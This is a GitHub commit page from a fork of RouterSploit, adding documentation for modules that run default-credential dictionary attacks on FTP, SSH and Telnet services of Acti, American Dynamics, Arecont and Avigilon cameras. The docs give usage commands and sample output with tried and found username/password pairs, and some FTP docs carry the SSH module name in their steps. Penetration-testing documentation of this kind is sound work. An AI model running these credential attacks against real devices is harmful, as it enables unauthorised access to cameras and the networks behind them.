forked from threat9/routersploit
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Adding basic docs for creds modules (threat9#443)
- Loading branch information
Showing
153 changed files
with
5,702 additions
and
12 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against Acti Camera FTP service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/acti/ftp_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/acti/ftp_default_creds | ||
| rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (Acti Camera Default FTP Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes FTP service | ||
| [*] Starting attack against FTP service | ||
| [*] thread-0 thread is starting... | ||
| [-] Authentication Failed - Username: 'admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'admin' Password: '123456' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '123456' | ||
| [+] Authenticated Succeed - Username: 'admin' Password: 'admin' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 0.06290411949157715 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 21 ftp admin admin | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against Acti Camera SSH service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/acti/ssh_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/acti/ssh_default_creds | ||
| rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (Acti Camera Default SSH Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes SSH service | ||
| [*] Starting default credentials attack against SSH service | ||
| [*] thread-0 thread is starting... | ||
| [-] SSH Authentication Failed - Username: 'admin' Password: '12345' | ||
| [-] SSH Authentication Failed - Username: 'admin' Password: '123456' | ||
| [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' | ||
| [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' | ||
| [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 2.3932292461395264 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 22 ssh admin admin | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against Acti Camera Telnet service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/acti/telnet_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/acti/telnet_default_creds | ||
| rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (Acti Camera Default Telnet Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes Telnet service | ||
| [*] Starting default credentials attack against Telnet service | ||
| [*] thread-0 thread is starting... | ||
| [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' | ||
| [-] Telnet Authentication Failed - Username: '1234' Password: '1234' | ||
| [-] Telnet Authentication Failed - Username: 'root' Password: '12345' | ||
| [-] Telnet Authentication Failed - Username: 'root' Password: 'root' | ||
| [+] Telnet Authentication Successful - Username: 'user' Password: 'user' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 5.389287948608398 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 23 telnet user user | ||
| ``` |
38 changes: 38 additions & 0 deletions
38
docs/modules/creds/cameras/american_dynamics/ftp_default_creds.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against American Dynamics Camera FTP service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/american_dynamics/ssh_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/american_dynamics/ftp_default_creds | ||
| rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (American Dynamics Camera Default FTP Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes FTP service | ||
| [*] Starting attack against FTP service | ||
| [*] thread-0 thread is starting... | ||
| [-] Authentication Failed - Username: 'admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'admin' Password: '123456' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '123456' | ||
| [+] Authenticated Succeed - Username: 'admin' Password: 'admin' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 0.06290411949157715 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 21 ftp admin admin | ||
| ``` |
38 changes: 38 additions & 0 deletions
38
docs/modules/creds/cameras/american_dynamics/ssh_default_creds.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against American Dynamics Camera SSH service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/american_dynamics/ssh_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/american_dynamics/ssh_default_creds | ||
| rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (American Dynamics Camera Default SSH Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes SSH service | ||
| [*] Starting default credentials attack against SSH service | ||
| [*] thread-0 thread is starting... | ||
| [-] SSH Authentication Failed - Username: 'admin' Password: '12345' | ||
| [-] SSH Authentication Failed - Username: 'admin' Password: '123456' | ||
| [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' | ||
| [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' | ||
| [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 2.3932292461395264 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 22 ssh admin admin | ||
| ``` |
38 changes: 38 additions & 0 deletions
38
docs/modules/creds/cameras/american_dynamics/telnet_default_creds.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against American Dynamics Camera Telnet service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/american_dynamics/telnet_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/american_dynamics/telnet_default_creds | ||
| rsf (American Dynamics Camera Default Telnet Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (American Dynamics Camera Default Telnet Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes Telnet service | ||
| [*] Starting default credentials attack against Telnet service | ||
| [*] thread-0 thread is starting... | ||
| [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' | ||
| [-] Telnet Authentication Failed - Username: '1234' Password: '1234' | ||
| [-] Telnet Authentication Failed - Username: 'root' Password: '12345' | ||
| [-] Telnet Authentication Failed - Username: 'root' Password: 'root' | ||
| [+] Telnet Authentication Successful - Username: 'user' Password: 'user' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 5.389287948608398 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 23 telnet user user | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against Arecont Camera FTP service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/arecont/ssh_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/arecont/ftp_default_creds | ||
| rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (Arecont Camera Default FTP Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes FTP service | ||
| [*] Starting attack against FTP service | ||
| [*] thread-0 thread is starting... | ||
| [-] Authentication Failed - Username: 'admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'admin' Password: '123456' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '123456' | ||
| [+] Authenticated Succeed - Username: 'admin' Password: 'admin' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 0.06290411949157715 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 21 ftp admin admin | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against Arecont Camera SSH service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/arecont/ssh_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/arecont/ssh_default_creds | ||
| rsf (Arecont Camera Default SSH Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (Arecont Camera Default SSH Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes SSH service | ||
| [*] Starting default credentials attack against SSH service | ||
| [*] thread-0 thread is starting... | ||
| [-] SSH Authentication Failed - Username: 'admin' Password: '12345' | ||
| [-] SSH Authentication Failed - Username: 'admin' Password: '123456' | ||
| [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' | ||
| [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' | ||
| [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 2.3932292461395264 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 22 ssh admin admin | ||
| ``` |
38 changes: 38 additions & 0 deletions
38
docs/modules/creds/cameras/arecont/telnet_default_creds.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against Arecont Camera Telnet service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/arecont/telnet_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/arecont/telnet_default_creds | ||
| rsf (Arecont Camera Default Telnet Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (Arecont Camera Default Telnet Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes Telnet service | ||
| [*] Starting default credentials attack against Telnet service | ||
| [*] thread-0 thread is starting... | ||
| [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' | ||
| [-] Telnet Authentication Failed - Username: '1234' Password: '1234' | ||
| [-] Telnet Authentication Failed - Username: 'root' Password: '12345' | ||
| [-] Telnet Authentication Failed - Username: 'root' Password: 'root' | ||
| [+] Telnet Authentication Successful - Username: 'user' Password: 'user' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 5.389287948608398 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 23 telnet user user | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Description | ||
|
|
||
| Module performs dictionary attack with default credentials against Avigilon Camera FTP service. | ||
| If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `./rsf.py` | ||
| 2. Do: `use creds/cameras/avigilon/ssh_default_creds` | ||
| 3. Do: `set target [TargetIP]` | ||
| 4. Do: `run` | ||
| 5. If valid credentials are found, they are displayed to the user. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| rsf > use creds/cameras/avigilon/ftp_default_creds | ||
| rsf (Avigilon Camera Default FTP Creds) > set target 192.168.1.1 | ||
| [+] target => 192.168.1.1 | ||
| rsf (Avigilon Camera Default FTP Creds) > run | ||
| [*] Running module... | ||
| [*] Target exposes FTP service | ||
| [*] Starting attack against FTP service | ||
| [*] thread-0 thread is starting... | ||
| [-] Authentication Failed - Username: 'admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'admin' Password: '123456' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '12345' | ||
| [-] Authentication Failed - Username: 'Admin' Password: '123456' | ||
| [+] Authenticated Succeed - Username: 'admin' Password: 'admin' | ||
| [*] thread-0 thread is terminated. | ||
| [*] Elapsed time: 0.06290411949157715 seconds | ||
| [+] Credentials found! | ||
| Target Port Service Username Password | ||
| ------ ---- ------- -------- -------- | ||
| 192.168.1.1 21 ftp admin admin | ||
| ``` |
Oops, something went wrong.